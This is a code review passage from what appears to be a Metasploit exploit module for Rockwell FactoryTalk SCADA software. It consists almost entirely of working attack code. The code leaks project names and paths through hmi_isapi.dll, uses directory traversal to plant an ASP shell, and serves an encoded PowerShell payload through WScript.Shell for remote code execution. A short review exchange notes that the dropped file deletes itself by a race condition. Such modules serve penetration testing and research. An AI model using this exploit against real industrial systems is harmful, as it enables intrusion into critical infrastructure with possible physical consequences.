modules/exploits/windows/scada/rockwell_factorytalk_rce.rb

```diff
@@ -0,0 +1,239 @@
+        payload.encoded,
+        payload.arch.first
+        # without comspec it seems to fail, so keep it this way
+        # remove_comspec: true
+      )
+      # add double quotes for classic ASP escaping
+      psh.gsub!('"', '""')
+
+      # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell
+      # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore...
+      # If this module is not working on an older Windows version, try the below as payload:
+      # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)
+      payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>}
+      send_response(cli, payload)
+      # payload file is deleted automatically by the server once we win the race!
+
+    elsif request.uri.include?(@proj_name)
+      # Directory traversal: vulnerable asp file will land in the path we provide
+      print_good("#{peer} - Target connected, sending file path with dir traversal")
+      # Check the comments in the exploit below function to understand why this is fixed
+      filename = "../SE/HMI Projects/#{@shelly}"
+      send_response(cli, filename)
+    end
+  end
+
+  def on_new_session(_session)
+    @shell_recv = true
+  end
+
+  def exploit
+    @shell_recv = false
+
+    # Infoleak 1 (project listing)
+    print_status("#{peer} - Listing projects on the server")
+    res = send_to_factory('/hmi_isapi.dll?GetHMIProjects')
+
+    fail_with(Failure::Unknown, 'Failed to obtain project list. Bailing') unless res && res.code == 200
+
+    print_status("#{peer} - Received list of projects from the server")
+    @proj_name = ''
+    proj_path = ''
+    xml = res.get_xml_document
+
+    # Parse XML project list and check each project for installation project path
+    xml.search('HMIProject').each do |project|
+      @proj_name = project.attributes['Name']
+
+      # Infoleak 2 (project installation path)
+      # In the original exploit, we used this to calculate the directory traversal path, but
+      # Google says the path is the same for all versions since at least 2007.
+      # Let's still abuse it to check if the project is valid.
+      url = "/hmi_isapi.dll?GetHMIProjectPath&#{@proj_name}"
+      res = send_to_factory(url)
+
+      proj_path = res.body.strip
+
+      # Check if response contains :\ that indicates a windows path
+      if proj_path.match(/:\\/)
+        print_status("#{peer} - Found project path: #{proj_path}")
+        # We only need first hit so we can quit the project parsing once we get it
+        break
+      end
+
+      # We reached end of XML and we didn't manage to get the installation path
+      @proj_name = nil
+    end
+
+    if !@proj_name
+      fail_with(Failure::Unknown, 'Failed to get a path to drop our shell, bailing out...')
+    end
+
+    shell_path = proj_path.sub(@proj_name, '').strip
+    print_good("#{peer} - Got a path to drop our shell: #{shell_path}")
```

Comment:
Does this path need to be cleaned up on a new session?

Reply:
Nope, the file gets automatically deleted due to the race condition!